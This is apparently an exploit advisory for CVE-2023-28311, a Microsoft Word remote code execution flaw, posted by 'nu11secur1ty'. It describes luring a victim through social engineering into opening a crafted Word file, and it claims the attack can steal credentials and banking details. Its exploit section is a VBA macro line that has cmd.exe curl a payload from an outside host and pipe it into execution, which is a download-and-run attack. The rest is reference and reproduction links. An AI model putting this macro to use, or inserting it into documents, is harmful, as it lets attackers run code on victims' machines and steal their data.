## Title: Microsoft Word Remote Code Execution Vulnerability ## Author: nu11secur1ty ## Date: 04.14.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3 ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-2023-28311 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a `Word` malicious file and he can steal credentials, bank accounts information, sniffing and tracking all the traffic of the victim without stopping - it depends on the scenario and etc. STATUS: HIGH Vulnerability [+]Exploit: The exploit server must be BROADCASTING at the moment when the victim hit the button of the exploit! ```vbs Call Shell("cmd.exe /S /c" & "curl -s http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus) ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311) ## Reference: [href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311) [href]( https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/) ## Proof and Exploit [href](https://streamable.com/s60x3k) ## Time spend: 01:00:00